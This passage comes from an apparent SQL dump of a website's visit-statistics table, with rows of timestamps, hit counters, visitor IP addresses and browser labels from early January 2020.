08.181.103','other'),(472730,1577992666,1,1,0,0,'181.47.12.227','chrome'),(472731,1577992894,1,1,0,0,'8.29.198.25','other'),(472732,1577994863,1,1,0,0,'95.108.181.103','other'),(472733,1577994961,1,1,0,0,'141.8.188.66','other'),(472734,1577995232,1,1,0,0,'91.209.11.236','other'),(472735,1577995626,1,1,0,0,'78.106.169.40','other'),(472736,1577996007,1,1,0,0,'95.108.213.55','other'),(472737,1577996590,1,0,1,0,'66.249.70.33',''),(472738,1577997034,1,1,0,0,'141.8.183.100','other'),(472739,1577997044,1,1,0,0,'66.249.70.36','chrome'),(472740,1577997079,1,1,0,0,'95.108.213.3','other'),(472741,1577997779,1,1,0,0,'178.154.171.66','other'),(472742,1578000819,1,1,0,0,'66.249.70.36','chrome'),(472743,1578001607,1,1,0,0,'178.154.171.127','other'),(472744,1578001626,1,1,0,0,'178.154.171.134','other'),(472745,1578001674,1,1,0,0,'91.196.178.132','chrome'),(472746,1578002855,1,1,0,0,'8.29.198.25','other'),(472747,1578003810,1,1,0,0,'8.29.198.25','other'),(472748,1578004124,1,1,0,0,'178.154.171.134','other'),(472749,1578005472,1,1,0,0,'178.154.171.134','other'),(472750,1578005713,1,1,0,0,'157.55.39.138','other'),(472751,1578006759,1,1,0,0,'178.154.171.134','other'),(472752,1578007904,1,1,0,0,'178.154.171.134','other'),(472753,1578008382,1,1,0,0,'13.66.139.0','other'),(472754,1578009408,1,1,0,0,'178.154.171.134','other'),(472755,1578010754,8,8,0,0,'157.245.206.139','firefox'),(472756,1578012904,1,1,0,0,'178.154.171.134','other'),(472757,1578012914,1,1,0,0,'62.205.134.182','other'),(472758,1578013707,1,1,0,0,'8.29.198.27','other'),(472759,1578014748,1,1,0,0,'8.29.198.25','other'),(472760,1578015372,1,1,0,0,'178.154.171.134','other'),(472761,1578016086,1,1,0,0,'141.8.183.73','chrome'),(472762,1578016089,1,1,0,0,'87.250.224.90','chrome'),(472763,1578017249,1,1,0,0,'178.154.171.134','chrome'),(472764,1578017276,2,2,0,0,'178.154.171.127','chrome'),(472765,1578018396,2,2,0,0,'141.8.142.2','chrome'),(472766,1578018406,1,1,0,0,'178.154.171.134','chrome'),(472767,1578018449,1,1,0,0,'178.154.171.127','chrome'),(472768,1578019495,1,1,0,0,'178.154.171.134','chrome'),(472769,1578020521,1,1,0,0,'141.8.142.2','chrome'),(472770,1578020525,1,1,0,0,'178.154.171.127','chrome'),(472771,1578021283,1,1,0,0,'54.189.187.176','chrome'),(472772,1578021287,1,1,0,0,'52.34.24.33','other'),(472773,1578021588,1,1,0,0,'178.154.171.127','chrome'),(472774,1578021640,1,1,0,0,'37.9.113.163','chrome'),(472775,1578022822,2,2,0,0,'141.8.142.2','chrome'),(472776,1578022863,1,1,0,0,'178.154.171.134','other'),(472777,1578023538,1,1,0,0,'157.55.39.138','other'),(472778,1578024076,3,3,0,0,'178.154.171.134','chrome'),(472779,1578024565,1,1,0,0,'8.29.198.25','other'),(472780,1578025322,1,1,0,0,'178.154.171.134','other'),(472781,1578025626,1,1,0,0,'8.29.198.26','other'),(472782,1578026505,1,1,0,0,'178.154.171.134','chrome'),(472783,1578026633,1,1,0,0,'128.124.17.164','chrome'),(472784,1578027587,1,1,0,0,'178.154.171.134','other'),(472785,1578027603,1,1,0,0,'178.154.171.134','chrome'),(472786,1578027625,1,1,0,0,'66.249.64.26','chrome'),(472787,1578027650,1,1,0,0,'178.154.171.127','other'),(472788,1578028750,1,1,0,0,'178.154.171.134','chrome'),(472789,1578028851,2,2,0,0,'157.55.39.138','other'),(472790,1578029185,2,2,0,0,'178.154.171.134','other'),(472791,1578029917,1,1,0,0,'141.8.142.2','chrome'),(472792,1578030243,1,1,0,0,'62.205.134.182','other'),(472793,1578030558,1,1,0,0,'157.55.39.148','other'),(472794,1578031195,2,2,0,0,'178.154.171.134','other'),(472795,1578031214,3,3,0,0,'178.154.171.134','chrome'),(472796,1578032444,1,1,0,0,'141.8.142.164','chrome'),(472797,1578032451,1,1,0,0,'141.8.183.53','chrome'),(472798,1578032454,1,1,0,0,'5.45.207.65','chrome'),(472799,1578032458,1,1,0,0,'141.8.183.73','chrome'),(472800,1578032461,1,1,0,0,'178.154.171.127','chrome'),(472801,1578032469,2,2,0,0,'141.8.142.2','chrome'),(472802,1578032492,1,1,0,0,'178.154.171.134','other'),(472803,1578033685,2,2,0,0,'178.154.171.134','other'),(472804,1578034513,1,1,0,0,'91.196.178.81','chrome'),(472805,1578034557,1,1,0,0,'101.4.60.63','chrome'),(472806,1578034754,2,2,0,0,'178.154.171.134','chrome'),(472807,1578035016,1,1,0,0,'157.55.39.148','other'),(472808,1578035191,2,2,0,0,'207.46.13.16','other'),(472809,1578035414,1,1,0,0,'8.29.198.26','other'),(472810,1578035921,1,1,0,0,'95.108.213.55','chrome'),(472811,1578035935,1,1,0,0,'178.154.171.134','other'),(472812,1578035995,1,1,0,0,'141.8.183.111','chrome'),(472813,1578036112,1,1,0,0,'157.55.39.148','other'),(472814,1578036504,1,1,0,0,'8.29.198.26','other'),(472815,1578037133,1,1,0,0,'87.250.224.90','chrome'),(472816,1578037143,1,1,0,0,'178.154.171.127','chrome'),(472817,1578037147,1,1,0,0,'141.8.142.2','chrome'),(472818,1578037150,1,1,0,0,'178.154.171.134','chrome'),(472819,1578037158,1,1,0,0,'207.46.13.16','other'),(472820,1578038536,1,1,0,0,'178.154.171.127','chrome'),(472821,1578038586,1,1,0,0,'178.154.171.134','other'),(472822,1578038632,1,1,0,0,'141.8.142.2','chrome'),(472823,1578038705,1,1,0,0,'157.55.39.138','other'),(472824,1578039315,1,1,0,0,'109.122.59.82','chrome'),(472825,1578039533,3,3,0,0,'195.88.242.232','firefox'),(472826,1578039535,1,1,0,0,'195.88.242.232','chrome'),(472827,1578039557,1,1,0,0,'46.172.76.18','chrome'),(472828,1578039932,1,1,0,0,'178.154.171.127','chrome'),(472829,1578039941,1,1,0,0,'178.154.171.134','chrome'),(472830,1578040147,1,1,0,0,'207.46.13.70','other'),(472831,1578041218,1,1,0,0,'178.154.171.134','chrome'),(472832,1578041335,1,1,0,0,'178.154.171.127','chrome'),(472833,1578041545,1,1,0,0,'178.154.171.134','other'),(472834,1578042618,1,1,0,0,'157.55.39.138','other'),(472835,1578043401,1,1,0,0,'13.66.139.0','other'),(472836,1578043571,1,1,0,0,'193.110.89.166','chrome'),(472837,1578043732,3,3,0,0,'178.154.171.134','chrome'),(472838,1578044083,1,1,0,0,'178.154.171.127','other'),(472839,1578044811,1,1,0,0,'141.8.142.50','chrome'),(472840,1578044856,3,3,0,0,'178.154.171.134','chrome'),(472841,1578044859,1,1,0,0,'141.8.142.2','chrome'),(472842,1578044952,1,1,0,0,'91.196.178.173','chrome'),(472843,1578045213,1,1,0,0,'46.172.76.18','chrome'),(472844,1578045323,1,1,0,0,'46.211.18.253','chrome'),(472845,1578045550,1,1,0,0,'66.249.64.27','chrome'),(472846,1578045898,1,1,0,0,'91.199.93.129','chrome'),(472847,1578045989,1,1,0,0,'141.8.188.25','chrome'),(472848,1578046074,1,1,0,0,'141.8.142.128','chrome'),(472849,1578046170,1,1,0,0,'3.210.184.161','chrome'),(472850,1578046300,1,1,0,0,'8.29.198.27','other'),(472851,1578046703,3,3,0,0,'207.46.13.93','other'),(472852,1578047229,1,1,0,0,'207.46.13.16','other'),(472853,1578047232,1,1,0,0,'141.8.183.67','chrome'),(472854,1578047253,1,1,0,0,'178.154.171.7','chrome'),(472855,1578047259,1,1,0,0,'37.9.113.142','chrome'),(472856,1578047262,1,1,0,0,'37.9.113.97','chrome'),(472857,1578047313,1,1,0,0,'37.9.113.39','other'),(472858,1578047374,1,1,0,0,'8.29.198.26','other'),(472859,1578047377,1,1,0,0,'141.8.183.67','other'),(472860,1578047380,1,1,0,0,'141.8.142.164','other'),(472861,1578048346,1,1,0,0,'141.8.183.100','other'),(472862,1578048349,1,1,0,0,'141.8.188.25','chrome'),(472863,1578048352,1,1,0,0,'178.154.171.66','chrome'),(472864,1578048359,1,1,0,0,'37.9.113.202','chrome'),(472865,1578048386,1,1,0,0,'207.46.13.214','other'),(472866,1578049012,1,1,0,0,'91.196.178.19','chrome'),(472867,1578049351,1,1,0,0,'141.8.142.2','other'),(472868,1578049461,2,2,0,0,'207.46.13.93','other'),(472869,1578050231,1,1,0,0,'91.196.178.19','chrome'),(472870,1578050301,1,1,0,0,'141.8.132.19','other'),(472871,1578050845,1,1,0,0,'66.249.64.27','chrome'),(472872,1578050846,1,1,0,0,'109.74.154.72','chrome'),(472873,1578050933,1,1,0,0,'91.196.177.46','chrome'),(472874,1578051040,1,1,0,0,'207.46.13.214','other'),(472875,1578051958,1,1,0,0,'207.46.13.16','other'),(472876,1578052196,1,1,0,0,'37.9.113.6','chrome'),(472877,1578052206,1,1,0,0,'87.250.224.90','chrome'),(472878,1578052262,1,1,0,0,'141.8.132.12','chrome'),(472879,1578052280,1,1,0,0,'37.9.113.202','chrome'),(472880,1578052342,1,1,0,0,'95.108.213.3','chrome'),(472881,1578052940,1,1,0,0,'207.46.13.16','other'),(472882,1578053929,2,2,0,0,'91.196.178.74','chrome'),(472883,1578054392,2,2,0,0,'207.46.13.16','other'),(472884,1578054623,1,1,0,0,'95.108.213.3','other'),(472885,1578055338,1,1,0,0,'91.196.178.19','chrome'),(472886,1578055592,1,1,0,0,'91.196.178.8','chrome'),(472887,1578055686,1,1,0,0,'91.196.178.81','chrome'),(472888,1578055917,1,1,0,0,'178.154.171.66','chrome'),(472889,1578055933,1,1,0,0,'95.108.181.103','chrome'),(472890,1578055937,1,1,0,0,'37.9.113.142','chrome'),(472891,1578055952,1,1,0,0,'37.9.113.97','chrome'),(472892,1578055971,1,1,0,0,'95.108.213.3','chrome'),(472893,1578055976,1,1,0,0,'95.108.213.61','chrome'),(472894,1578056826,1,1,0,0,'91.196.178.19','chrome'),(472895,1578057190,1,1,0,0,'46.211.60.189','chrome'),(472896,1578057191,1,1,0,0,'8.29.198.25','other'),(472897,1578057240,1,1,0,0,'95.108.181.103','chrome'),(472898,1578057275,1,1,0,0,'37.9.113.39','chrome'),(472899,1578057286,1,1,0,0,'37.9.113.200','chrome'),(472900,1578057312,1,1,0,0,'141.8.142.132','chrome'),(472901,1578057339,1,1,0,0,'178.154.171.127','chrome'),(472902,1578057342,1,1,0,0,'37.9.113.10','chrome'),(472903,1578057634,2,2,0,0,'207.46.13.93','other'),(472904,1578058267,1,1,0,0,'8.29.198.26','other'),(472905,1578058537,1,1,0,0,'141.8.183.33','chrome'),(472906,1578058547,1,1,0,0,'141.8.188.25','chrome'),(472907,1578058585,1,1,0,0,'87.250.224.90','chrome'),(472908,1578058718,2,2,0,0,'207.46.13.93','other'),(472909,1578059833,1,1,0,0,'141.8.183.33','chrome'),(472910,1578059845,1,1,0,0,'37.9.113.177','chrome'),(472911,1578059917,2,2,0,0,'157.55.39.4','other'),(472912,1578059948,1,1,0,0,'94.244.45.60','firefox'),(472913,1578060123,1,1,0,0,'88.154.83.63','chrome'),(472914,1578060873,1,1,0,0,'178.154.171.127','chrome'),(472915,1578061989,1,1,0,0,'46.211.129.137','chrome'),(472916,1578062036,1,1,0,0,'178.154.171.134','chrome'),(472917,1578062364,2,2,0,0,'157.55.39.99','other'),(472918,1578062571,1,1,0,0,'207.46.13.93','other'),(472919,1578062881,1,1,0,0,'188.163.122.82','chrome'),(472920,1578063324,1,1,0,0,'141.8.132.2','chrome'),(472921,1578063328,1,1,0,0,'178.154.171.127','chrome'),(472922,1578063355,1,1,0,0,'5.45.207.65','chrome'),(472923,1578063477,1,1,0,0,'157.55.39.99','other'),(472924,1578064087,1,1,0,0,'157.55.39.4','other'),(472925,1578064384,1,1,0,0,'91.196.178.77','firefox'),(472926,1578064514,1,1,0,0,'178.154.171.33','chrome'),(472927,1578064530,1,1,0,0,'141.8.183.73','chrome'),(472928,1578064551,1,1,0,0,'141.8.183.33','chrome'),(472929,1578064557,1,1,0,0,'141.8.132.12','chrome'),(472930,1578064560,1,1,0,0,'141.8.142.161','chrome'),(472931,1578064563,1,1,0,0,'141.8.132.19','chrome'),(472932,1578064631,1,1,0,0,'141.8.142.128','chrome'),(472933,1578065649,1,1,0,0,'37.9.113.97','chrome'),(472934,1578065665,1,1,0,0,'95.108.213.3','chrome'),(472935,1578065683,1,1,0,0,'37.9.113.6','chrome'),(472936,1578065688,1,1,0,0,'141.8.132.9','chrome'),(472937,1578065716,1,1,0,0,'141.8.142.44','chrome'),(472938,1578066362,2,1,1,0,'207.46.13.93',''),(472939,1578066600,1,1,0,0,'141.8.188.25','chrome'),(472940,1578067219,1,1,0,0,'91.196.178.173','chrome'),(472941,1578067404,1,1,0,0,'157.55.39.4','other'),(472942,1578068066,1,1,0,0,'8.29.198.26','other'),(472943,1578068553,2,2,0,0,'207.46.13.93','other'),(472944,1578068669,1,1,0,0,'141.8.183.53','other'),(472945,1578068703,1,1,0,0,'141.8.183.33','other'),(472946,1578068716,1,1,0,0,'141.8.132.12','chrome'),(472947,1578068751,1,1,0,0,'141.8.188.25','chrome'),(472948,1578069162,1,1,0,0,'8.29.198.25','other'),(472949,1578069505,1,0,1,0,'157.55.39.4',''),(472950,1578069628,1,1,0,0,'141.8.142.177','other'),(472951,1578069663,5,5,0,0,'66.249.64.27','chrome'),(472952,1578069689,15,15,0,0,'66.249.64.26','chrome'),(472953,1578069881,1,1,0,0,'207.46.13.93','other'),(472954,1578069923,1,1,0,0,'91.196.178.180','chrome'),(472955,1578069946,1,1,0,0,'13.66.139.0','other'),(472956,1578070379,1,1,0,0,'157.55.39.4','other'),(472957,1578070751,1,1,0,0,'178.154.171.134','chrome'),(472958,1578070797,1,1,0,0,'141.8.183.73','chrome'),(472959,1578070952,1,1,0,0,'178.154.171.127','other'),(472960,1578071204,1,1,0,0,'207.46.13.93','other'),(472961,1578071729,1,1,0,0,'141.8.132.12','other'),(472962,1578071773,1,1,0,0,'141.8.183.73','other'),(472963,1578071827,2,2,0,0,'141.8.142.2','chrome'),(472964,1578071830,1,1,0,0,'141.8.183.73','chrome'),(472965,1578071842,1,1,0,0,'178.154.171.127','chrome'),(472966,1578072065,1,1,0,0,'157.55.39.99','other'),(472967,1578072736,1,1,0,0,'141.8.142.2','chrome'),(472968,1578072759,1,1,0,0,'178.154.171.127','chrome'),(472969,1578073737,1,1,0,0,'178.154.171.134','chrome'),(472970,1578073742,2,2,0,0,'141.8.142.2','chrome'),(472971,1578073848,3,3,0,0,'46.211.83.143','chrome'),(472972,1578074060,1,1,0,0,'94.153.101.208','chrome'),(472973,1578074231,1,1,0,0,'157.55.39.4','other'),(472974,1578074335,1,1,0,0,'91.209.11.236','other'),(472975,1578074349,1,1,0,0,'157.55.39.99','other'),(472976,1578074786,1,1,0,0,'141.8.132.12','chrome'),(472977,1578074789,1,1,0,0,'5.45.207.49','chrome'),(472978,1578074793,1,1,0,0,'141.8.183.100','chrome'),(472979,1578074796,1,1,0,0,'141.8.142.119','chrome'),(472980,1578074799,1,1,0,0,'37.9.113.33','chrome'),(472981,1578074803,1,1,0,0,'141.8.188.25','chrome'),(472982,1578074806,1,1,0,0,'141.8.132.37','chrome'),(472983,1578074809,1,1,0,0,'141.8.132.19','chrome'),(472984,1578074818,1,1,0,0,'87.250.224.90','chrome'),(472985,1578074890,1,1,0,0,'92.112.250.245','chrome'),(472986,1578075115,1,1,0,0,'91.196.178.46','chrome'),(472987,1578075457,1,1,0,0,'207.46.13.93','other'),(472988,1578075930,1,1,0,0,'178.154.171.127','chrome'),(472989,1578076153,1,1,0,0,'178.154.171.127','other'),(472990,1578076630,1,1,0,0,'157.55.39.99','other'),(472991,1578076894,1,1,0,0,'178.154.171.134','other'),(472992,1578076959,1,1,0,0,'95.108.213.55','chrome'),(472993,1578077966,1,1,0,0,'178.154.171.134','chrome'),(472994,1578078968,1,1,0,0,'178.154.171.134','chrome'),(472995,1578078972,1,1,0,0,'8.29.198.25','other'),(472996,1578079012,1,0,1,0,'66.249.70.36',''),(472997,1578079016,1,1,0,0,'178.154.171.127','chrome'),(472998,1578079725,1,1,0,0,'178.154.171.134','other'),(472999,1578079933,1,1,0,0,'178.154.171.134','chrome'),(473000,1578079937,1,1,0,0,'178.154.171.127','chrome'),(473001,1578080252,1,1,0,0,'8.29.198.27','other'),(473002,1578080938,1,1,0,0,'178.154.171.127','chrome'),(473003,1578080950,1,1,0,0,'178.154.171.134','chrome'),(473004,1578080999,1,1,0,0,'178.154.171.134','other'),(473005,1578081425,2,2,0,0,'207.46.13.93','other'),(473006,1578081795,1,1,0,0,'141.8.142.2','chrome'),(473007,1578081799,1,1,0,0,'141.8.183.73','chrome'),(473008,1578082463,1,1,0,0,'207.46.13.93','other'),(473009,1578082775,1,1,0,0,'141.8.183.18','chrome'),(473010,1578082777,1,1,0,0,'37.9.113.177','chrome'),(473011,1578083163,1,1,0,0,'13.66.139.0','other'),(473012,1578084168,1,1,0,0,'157.55.39.4','other'),(473013,1578084419,1,1,0,0,'46.211.147.147','other'),(473014,1578084537,1,1,0,0,'157.55.39.99','other'),(473015,1578084781,1,1,0,0,'95.108.213.3','chrome'),(473016,1578084843,1,1,0,0,'141.8.142.44','chrome'),(473017,1578085593,1,1,0,0,'207.46.13.93','other'),(473018,1578086203,1,1,0,0,'157.55.39.4','other'),(473019,1578087010,1,1,0,0,'141.8.188.20','chrome'),(473020,1578087029,1,1,0,0,'141.8.142.132','chrome'),(473021,1578087092,1,1,0,0,'141.8.183.73','chrome'),(473022,1578087170,3,3,0,0,'157.55.39.99','other'),(473023,1578087673,1,1,0,0,'207.46.13.93','other'),(473024,1578087763,1,1,0,0,'141.8.188.25','other'),(473025,1578087944,1,1,0,0,'13.66.139.0','other'),(473026,1578088074,1,1,0,0,'95.108.213.3','chrome'),(473027,1578088077,1,1,0,0,'141.8.132.31','chrome'),(473028,1578088103,1,1,0,0,'37.9.113.39','chrome'),(473029,1578088106,1,1,0,0,'141.8.188.20','chrome'),(473030,1578088118,3,3,0,0,'157.55.39.99','other'),(473031,1578089149,1,1,0,0,'141.8.183.33','chrome'),(473032,1578089152,1,1,0,0,'141.8.132.12','chrome'),(473033,1578089158,1,1,0,0,'141.8.183.100','chrome'),(473034,1578089874,1,1,0,0,'8.29.198.26','other'),(473035,1578090316,1,1,0,0,'37.9.113.200','chrome'),(473036,1578090362,1,1,0,0,'37.9.113.6','chrome'),(473037,1578091005,1,1,0,0,'157.55.39.4','other'),(473038,1578091193,1,1,0,0,'8.29.198.27','other'),(473039,1578091780,1,1,0,0,'141.8.142.161','chrome'),(473040,1578092315,1,1,0,0,'209.239.122.40','firefox'),(473041,1578092656,1,1,0,0,'157.55.39.99','other'),(473042,1578094525,2,2,0,0,'157.55.39.228','other'),(473043,1578094966,1,1,0,0,'89.163.242.62','other'),(473044,1578094990,1,1,0,0,'37.9.113.97','other'),(473045,1578096174,1,1,0,0,'141.8.132.12','chrome'),(473046,1578098248,1,1,0,0,'141.8.183.67','chrome'),(473047,1578098290,1,1,0,0,'141.8.188.39','chrome'),(473048,1578098598,1,1,0,0,'157.55.39.228','other'),(473049,1578098849,1,1,0,0,'46.4.33.48','other'),(473050,1578099312,1,1,0,0,'62.205.134.182','other'),(473051,1578100235,1,1,0,0,'141.8.132.19','chrome'),(473052,1578100776,1,1,0,0,'8.29.198.26','other'),(473053,1578100817,1,1,0,0,'141.8.183.33','other'),(473054,1578101098,1,1,0,0,'141.8.183.73','chrome'),(473055,1578101113,1,1,0,0,'87.250.224.90','chrome'),(473056,1578101117,1,1,0,0,'141.8.142.161','chrome'),(473057,1578101162,1,1,0,0,'141.8.188.25','chrome'),(473058,1578101177,1,1,0,0,'141.8.142.44','chrome'),(473059,1578101210,1,1,0,0,'87.250.224.90','other'),(473060,1578102088,1,1,0,0,'8.29.198.27','other'),(473061,1578102117,1,1,0,0,'141.8.142.2','chrome'),(473062,1578102119,1,1,0,0,'141.8.183.73','chrome'),(473063,1578102133,1,1,0,0,'141.8.188.25','chrome'),(473064,1578102136,1,1,0,0,'178.154.171.40','chrome'),(473065,1578103407,1,1,0,0,'141.8.132.12','chrome'),(473066,1578103410,1,1,0,0,'141.8.132.37','chrome'),(473067,1578103724,1,1,0,0,'157.55.39.99','other'),(473068,1578103821,1,1,0,0,'13.66.139.0','other'),(473069,1578104331,1,1,0,0,'178.154.171.134','other'),(473070,1578105290,2,2,0,0,'5.45.207.44','other'),(473071,1578105604,1,1,0,0,'141.8.183.73','chrome'),(473072,1578105607,1,1,0,0,'87.250.224.90','chrome'),(473073,1578105610,1,1,0,0,'141.8.183.33','chrome'),(473074,1578105991,1,1,0,0,'157.55.39.228','other'),(473075,1578106220,1,1,0,0,'141.8.183.18','chrome'),(473076,1578107139,1,1,0,0,'141.8.142.128','chrome'),(473077,1578107158,1,1,0,0,'37.9.113.200','chrome'),(473078,1578107432,1,1,0,0,'54.202.178.114','chrome'),(473079,1578107435,1,1,0,0,'52.34.24.33','other'),(473080,1578108121,1,1,0,0,'141.8.183.100','chrome'),(473081,1578109014,1,1,0,0,'178.154.171.66','chrome'),(473082,1578109029,1,1,0,0,'141.8.183.18','chrome'),(473083,1578109064,1,1,0,0,'37.9.113.39','chrome'),(473084,1578110386,1,1,0,0,'141.8.142.128','other'),(473085,1578111107,1,1,0,0,'37.9.113.39','chrome'),(473086,1578111120,1,1,0,0,'141.8.188.20','chrome'),(473087,1578111143,1,1,0,0,'141.8.142.132','chrome'),(473088,1578111162,1,1,0,0,'209.17.96.154','other'),(473089,1578111291,1,1,0,0,'178.154.171.127','other'),(473090,1578111293,1,1,0,0,'141.8.132.28','other'),(473091,1578111666,1,1,0,0,'8.29.198.26','other'),(473092,1578111949,2,2,0,0,'157.55.39.238','other'),(473093,1578112138,1,1,0,0,'141.8.188.25','chrome'),(473094,1578112377,1,1,0,0,'157.55.39.228','other'),(473095,1578112985,1,1,0,0,'8.29.198.26','other'),(473096,1578113100,1,1,0,0,'141.8.142.2','chrome'),(473097,1578113121,1,1,0,0,'87.250.224.90','chrome'),(473098,1578115068,1,1,0,0,'95.108.213.3','chrome'),(473099,1578115104,1,1,0,0,'5.45.207.44','other'),(473100,1578115122,1,1,0,0,'178.154.171.127','chrome'),(473101,1578115633,1,0,1,0,'66.249.64.27',''),(473102,1578115638,1,1,0,0,'66.249.64.27','chrome'),(473103,1578116221,1,1,0,0,'5.45.207.44','chrome'),(473104,1578116709,1,1,0,0,'62.205.134.182','other'),(473105,1578116835,2,2,0,0,'66.249.64.27','chrome'),(473106,1578117336,3,3,0,0,'66.249.64.28','chrome'),(473107,1578117406,4,4,0,0,'66.249.64.26','chrome'),(473108,1578117520,2,2,0,0,'207.46.13.54','other'),(473109,1578118055,1,1,0,0,'157.55.39.228','other'),(473110,1578118288,3,3,0,0,'66.249.64.28','chrome'),(473111,1578118343,6,6,0,0,'66.249.64.26','chrome'),(473112,1578118423,7,7,0,0,'66.249.64.27','chrome'),(473113,1578118964,1,1,0,0,'66.249.70.33','chrome'),(473114,1578119317,1,1,0,0,'141.8.132.19','chrome'),(473115,1578119321,1,1,0,0,'37.9.113.39','chrome'),(473116,1578119328,1,1,0,0,'141.8.142.44','other'),(473117,1578119337,1,1,0,0,'178.154.171.127','chrome'),(473118,1578119340,1,1,0,0,'141.8.183.73','chrome'),(473119,1578119348,1,1,0,0,'141.8.142.161','chrome'),(473120,1578119401,1,1,0,0,'207.46.13.54','other'),(473121,1578120344,1,1,0,0,'207.46.13.54','other'),(473122,1578120436,1,1,0,0,'37.9.113.142','other'),(473123,1578120712,1,1,0,0,'141.8.183.73','other'),(473124,1578120715,1,1,0,0,'141.8.142.177','other'),(473125,1578121347,1,1,0,0,'157.55.39.228','other'),(473126,1578122179,1,1,0,0,'66.249.64.28','chrome'),(473127,1578122214,1,1,0,0,'66.249.70.36','chrome'),(473128,1578122275,1,1,0,0,'207.46.13.54','other'),(473129,1578122346,1,1,0,0,'37.9.113.142','chrome'),(473130,1578122374,1,1,0,0,'66.249.70.62','chrome'),(473131,1578122378,1,1,0,0,'141.8.142.132','other'),(473132,1578122455,1,1,0,0,'5.45.207.44','other'),(473133,1578122528,2,2,0,0,'60.191.38.77','firefox'),(473134,1578122529,2,2,0,0,'66.249.70.33','chrome'),(473135,1578122566,1,1,0,0,'8.29.198.26','other'),(473136,1578122640,2,2,0,0,'66.249.64.27','chrome'),(473137,1578122680,4,4,0,0,'66.249.64.26','chrome'),(473138,1578122770,1,1,0,0,'157.55.39.228','other'),(473139,1578123481,1,1,0,0,'141.8.183.111','chrome'),(473140,1578123484,1,1,0,0,'95.108.181.104','chrome'),(473141,1578123530,1,1,0,0,'141.8.183.15','chrome'),(473142,1578123771,1,1,0,0,'87.250.224.90','other'),(473143,1578123872,2,1,1,0,'66.249.70.33',''),(473145,1578123874,1,1,0,0,'8.29.198.26','other'),(473146,1578124052,3,3,0,0,'66.249.64.28','chrome'),(473147,1578124126,1,1,0,0,'141.8.183.111','other'),(473148,1578124152,2,2,0,0,'66.249.70.62','chrome'),(473149,1578124190,1,1,0,0,'207.46.13.54','other'),(473150,1578124217,9,9,0,0,'66.249.64.26','chrome'),(473151,1578124538,7,7,0,0,'66.249.64.27','chrome'),(473152,1578124614,1,1,0,0,'157.55.39.238','other'),(473153,1578124913,1,1,0,0,'66.249.70.36','chrome'),(473154,1578125218,7,7,0,0,'66.249.64.26','chrome'),(473155,1578125469,1,1,0,0,'66.249.64.28','chrome'),(473156,1578125543,1,1,0,0,'157.55.39.238','other'),(473157,1578125727,1,1,0,0,'141.8.142.2','chrome'),(473158,1578125735,1,1,0,0,'66.249.64.27','chrome'),(473159,1578126186,5,5,0,0,'66.249.64.26','chrome'),(473160,1578127032,3,3,0,0,'66.249.64.27','chrome'),(473161,1578127147,1,1,0,0,'66.249.64.28','chrome'),(473162,1578127152,3,3,0,0,'66.249.64.26','chrome'),(473163,1578127167,1,1,0,0,'66.249.70.62','chrome'),(473164,1578127180,1,1,0,0,'157.55.39.238','other'),(473165,1578127187,1,1,0,0,'66.249.70.33','chrome'),(473166,1578127200,2,2,0,0,'157.55.39.105','other'),(473167,1578127912,1,1,0,0,'141.8.142.2','other'),(473168,1578128943,1,1,0,0,'141.8.183.33','chrome'),(473169,1578128946,1,1,0,0,'141.8.132.12','chrome'),(473170,1578128978,1,1,0,0,'141.8.132.19','chrome'),(473171,1578128988,1,1,0,0,'37.9.113.202','other'),(473172,1578128991,1,1,0,0,'141.8.183.67','chrome'),(473173,1578129356,5,5,0,0,'66.249.64.26','chrome'),(473174,1578129401,3,3,0,0,'66.249.64.28','chrome'),(473175,1578129431,2,2,0,0,'66.249.64.27','chrome'),(473176,1578129717,1,1,0,0,'141.8.132.9','other'),(473177,1578130080,1,1,0,0,'54.36.149.43','other'),(473178,1578130105,1,1,0,0,'37.9.113.39','chrome'),(473179,1578130108,1,1,0,0,'141.8.188.66','chrome'),(473180,1578130276,22,22,0,0,'66.249.64.26','chrome'),(473181,1578130345,6,6,0,0,'66.249.64.28','chrome'),(473182,1578130575,3,3,0,0,'66.249.64.27','chrome'),(473183,1578130634,1,1,0,0,'66.249.70.36','chrome'),(473184,1578130648,1,1,0,0,'37.9.113.39','other'),(473185,1578131014,2,2,0,0,'66.249.70.33','chrome'),(473186,1578131035,1,1,0,0,'66.249.70.62','chrome'),(473187,1578131079,1,1,0,0,'207.46.13.54','other'),(473188,1578131180,1,1,0,0,'66.249.64.26','chrome'),(473189,1578131769,1,1,0,0,'37.9.113.200','other'),(473190,1578131876,1,1,0,0,'66.249.64.28','chrome'),(473191,1578132004,1,1,0,0,'141.8.132.9','other'),(473192,1578132118,1,1,0,0,'66.249.64.26','chrome'),(473193,1578132158,2,2,0,0,'66.249.64.27','chrome'),(473194,1578132531,1,1,0,0,'37.57.208.243','chrome'),(473195,1578132586,1,1,0,0,'213.109.232.114','chrome'),(473196,1578132668,1,1,0,0,'178.154.171.134','other'),(473197,1578132671,1,1,0,0,'141.8.142.2','other'),(473198,1578133189,1,1,0,0,'54.36.149.75','other'),(473199,1578133387,1,1,0,0,'66.249.64.28','chrome'),(473200,1578133420,1,1,0,0,'157.55.39.105','other'),(473201,1578133437,1,1,0,0,'8.29.198.25','other'),(473202,1578133498,1,1,0,0,'178.215.190.230','chrome'),(473203,1578133912,2,1,1,0,'207.46.13.182',''),(473204,1578134029,1,1,0,0,'141.8.132.12','chrome'),(473205,1578134055,1,1,0,0,'141.8.132.19','chrome'),(473206,1578134058,1,1,0,0,'37.9.113.33','chrome'),(473207,1578134748,1,1,0,0,'8.29.198.25','other'),(473208,1578135246,1,1,0,0,'141.8.142.164','chrome'),(473209,1578135789,1,1,0,0,'157.55.39.123','other'),(473210,1578136055,1,1,0,0,'157.55.39.238','other'),(473211,1578136315,1,1,0,0,'141.8.142.132','other'),(473212,1578136417,2,1,1,0,'207.46.13.182',''),(473213,1578136426,1,1,0,0,'66.249.64.28','chrome'),(473214,1578137052,1,1,0,0,'157.55.39.123','other'),(473215,1578137121,1,1,0,0,'157.55.39.238','other'),(473216,1578137641,1,1,0,0,'66.249.64.28','chrome'),(473217,1578137659,2,2,0,0,'66.249.64.26','chrome'),(473218,1578137962,1,1,0,0,'188.32.136.113','msie'),(473219,1578137963,1,1,0,0,'37.204.145.7','msie'),(473220,1578138020,1,1,0,0,'109.74.154.72','chrome'),(473221,1578138082,1,0,1,0,'157.55.39.123',''),(473222,1578138151,1,1,0,0,'209.17.96.218','other'),(473223,1578138351,1,1,0,0,'157.55.39.105','other'),(473224,1578138497,1,1,0,0,'141.8.132.12','chrome'),(473225,1578138559,1,1,0,0,'37.9.113.142','chrome'),(473226,1578138860,1,1,0,0,'66.249.64.26','chrome'),(473227,1578139260,1,1,0,0,'157.55.39.123','other')